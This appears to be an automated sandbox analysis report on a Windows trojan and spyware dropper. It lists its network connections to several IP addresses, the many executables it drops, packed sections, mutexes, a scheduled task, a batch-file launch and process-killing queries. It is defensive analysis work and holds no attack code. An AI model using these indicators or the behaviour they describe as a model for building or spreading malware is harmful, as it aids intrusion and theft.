                              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49794 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49795 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49798 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49799 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49802 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49803 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49805 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49807 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49810 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49811 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49814 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49830 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49868 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49880 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49894 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49911 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49915 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49922 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49927 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49942 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49944 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49949 version: TLS 1.2

                              System Summary

                              barindex
                              Source: bc893816fa.exe, 0000001F.00000000.3065867664.0000000000A62000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_96d000c4-6
                              Source: bc893816fa.exe, 0000001F.00000000.3065867664.0000000000A62000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4ccafa51-3
                              Source: bc893816fa.exe, 00000031.00000000.3263758575.0000000000A62000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ed646e7-c
                              Source: bc893816fa.exe, 00000031.00000000.3263758575.0000000000A62000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c1c325d4-1
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile dump: service123.exe.19.dr 314212352Jump to dropped file
                              Source: file.exeStatic PE information: section name:
                              Source: file.exeStatic PE information: section name: .idata
                              Source: skotes.exe.0.drStatic PE information: section name:
                              Source: skotes.exe.0.drStatic PE information: section name: .idata
                              Source: random[3].exe.6.drStatic PE information: section name:
                              Source: random[3].exe.6.drStatic PE information: section name: .idata
                              Source: random[3].exe.6.drStatic PE information: section name:
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name:
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name: .idata
                              Source: 74b92d58dc.exe.6.drStatic PE information: section name:
                              Source: random[1].exe2.6.drStatic PE information: section name:
                              Source: random[1].exe2.6.drStatic PE information: section name: .idata
                              Source: random[1].exe2.6.drStatic PE information: section name:
                              Source: 932bb971c3.exe.6.drStatic PE information: section name:
                              Source: 932bb971c3.exe.6.drStatic PE information: section name: .idata
                              Source: 932bb971c3.exe.6.drStatic PE information: section name:
                              Source: random[2].exe.6.drStatic PE information: section name:
                              Source: random[2].exe.6.drStatic PE information: section name: .idata
                              Source: random[2].exe.6.drStatic PE information: section name:
                              Source: c9692f9101.exe.6.drStatic PE information: section name:
                              Source: c9692f9101.exe.6.drStatic PE information: section name: .idata
                              Source: c9692f9101.exe.6.drStatic PE information: section name:
                              Source: random[3].exe0.6.drStatic PE information: section name:
                              Source: random[3].exe0.6.drStatic PE information: section name: .idata
                              Source: random[3].exe0.6.drStatic PE information: section name:
                              Source: e577d0589a.exe.6.drStatic PE information: section name:
                              Source: e577d0589a.exe.6.drStatic PE information: section name: .idata
                              Source: e577d0589a.exe.6.drStatic PE information: section name:
                              Source: random[2].exe0.6.drStatic PE information: section name:
                              Source: random[2].exe0.6.drStatic PE information: section name: .idata
                              Source: random[2].exe0.6.drStatic PE information: section name:
                              Source: ed7d415177.exe.6.drStatic PE information: section name:
                              Source: ed7d415177.exe.6.drStatic PE information: section name: .idata
                              Source: ed7d415177.exe.6.drStatic PE information: section name:
                              Source: random[2].exe1.6.drStatic PE information: section name:
                              Source: random[2].exe1.6.drStatic PE information: section name: .idata
                              Source: d0e32932f8.exe.6.drStatic PE information: section name:
                              Source: d0e32932f8.exe.6.drStatic PE information: section name: .idata
                              Source: e637491e0c.exe.6.drStatic PE information: section name:
                              Source: e637491e0c.exe.6.drStatic PE information: section name: .idata
                              Source: e637491e0c.exe.6.drStatic PE information: section name:
                              Source: 178ba86573.exe.6.drStatic PE information: section name:
                              Source: 178ba86573.exe.6.drStatic PE information: section name: .idata
                              Source: 178ba86573.exe.6.drStatic PE information: section name:
                              Source: random[3].exe1.6.drStatic PE information: section name:
                              Source: random[3].exe1.6.drStatic PE information: section name: .idata
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name:
                              Source: 6f3b41816f.exe.6.drStatic PE information: section name: .idata
                              Source: bb31c9d4a53941b6b913f33980d23feb.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C078BB0_2_00C078BB
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C070490_2_00C07049
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C088600_2_00C08860
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C031A80_2_00C031A8
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD81010_2_00CD8101
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC4B300_2_00BC4B30
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD7B6E0_2_00CD7B6E
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC4DE00_2_00BC4DE0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C02D100_2_00C02D10
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0779B0_2_00C0779B
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF7F360_2_00BF7F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE78BB1_2_00EE78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE88601_2_00EE8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE70491_2_00EE7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE31A81_2_00EE31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EA4B301_2_00EA4B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EA4DE01_2_00EA4DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE2D101_2_00EE2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00EE779B1_2_00EE779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00ED7F361_2_00ED7F36
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE78BB2_2_00EE78BB
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE88602_2_00EE8860
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE70492_2_00EE7049
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE31A82_2_00EE31A8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EA4B302_2_00EA4B30
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EA4DE02_2_00EA4DE0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE2D102_2_00EE2D10
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00EE779B2_2_00EE779B
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00ED7F362_2_00ED7F36
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D10009_2_002D1000
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002D4C8C9_2_002D4C8C
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002E6F3A9_2_002E6F3A
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: String function: 002D5190 appears 46 times
                              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BD80C0 appears 130 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00EB80C0 appears 260 times
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00EBDF80 appears 36 times
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: random[3].exe.6.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: random[3].exe.6.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                              Source: 74b92d58dc.exe.6.drStatic PE information: Section: ZLIB complexity 0.9974582619863014
                              Source: 74b92d58dc.exe.6.drStatic PE information: Section: wekcazbo ZLIB complexity 0.9943740803274977
                              Source: random[1].exe0.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: random[1].exe0.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: 85746525a0.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: 85746525a0.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: random[1].exe2.6.drStatic PE information: Section: hvytnhuk ZLIB complexity 0.9942864734081042
                              Source: 932bb971c3.exe.6.drStatic PE information: Section: hvytnhuk ZLIB complexity 0.9942864734081042
                              Source: random[2].exe.6.drStatic PE information: Section: uqowvfqu ZLIB complexity 0.9899639159728308
                              Source: c9692f9101.exe.6.drStatic PE information: Section: uqowvfqu ZLIB complexity 0.9899639159728308
                              Source: random[3].exe0.6.drStatic PE information: Section: agnlrrtx ZLIB complexity 0.9945160602247656
                              Source: e577d0589a.exe.6.drStatic PE information: Section: agnlrrtx ZLIB complexity 0.9945160602247656
                              Source: random[2].exe0.6.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                              Source: random[2].exe0.6.drStatic PE information: Section: lukocbxy ZLIB complexity 0.9947125312594726
                              Source: ed7d415177.exe.6.drStatic PE information: Section: ZLIB complexity 0.997384685359589
                              Source: ed7d415177.exe.6.drStatic PE information: Section: lukocbxy ZLIB complexity 0.9947125312594726
                              Source: e637491e0c.exe.6.drStatic PE information: Section: hvytnhuk ZLIB complexity 0.9942864734081042
                              Source: 796ecf2647.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: 796ecf2647.exe.6.drStatic PE information: Section: .bss ZLIB complexity 1.0003343485169491
                              Source: 178ba86573.exe.6.drStatic PE information: Section: uqowvfqu ZLIB complexity 0.9899639159728308
                              Source: 81d22383f9.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 81d22383f9.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 92aba5cf15.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: 92aba5cf15.exe.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: random[1].exe1.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                              Source: random[1].exe1.6.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: fb22de53cd93474896e72899203b572f.exe.12.dr, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                              Source: fb22de53cd93474896e72899203b572f.exe.12.dr, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                              Source: 12.2.81d22383f9.exe.3396d68.0.raw.unpack, PayloadExtensions.csSuspicious method names: .PayloadExtensions.GetArchitectureMinimum
                              Source: 12.2.81d22383f9.exe.3396d68.0.raw.unpack, PayloadV1.csSuspicious method names: .PayloadV1.Validate
                              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@142/126@28/17
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3600:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1020:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3020:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                              Source: C:\agfznulwo\fb22de53cd93474896e72899203b572f.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{f6bec8ba-58ff-4dfc-9981-2ec5ebd23734}-9MSZ40SLW145
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCommand line argument: .-9_2_002DE280
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeSystem information queried: HandleInformation
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
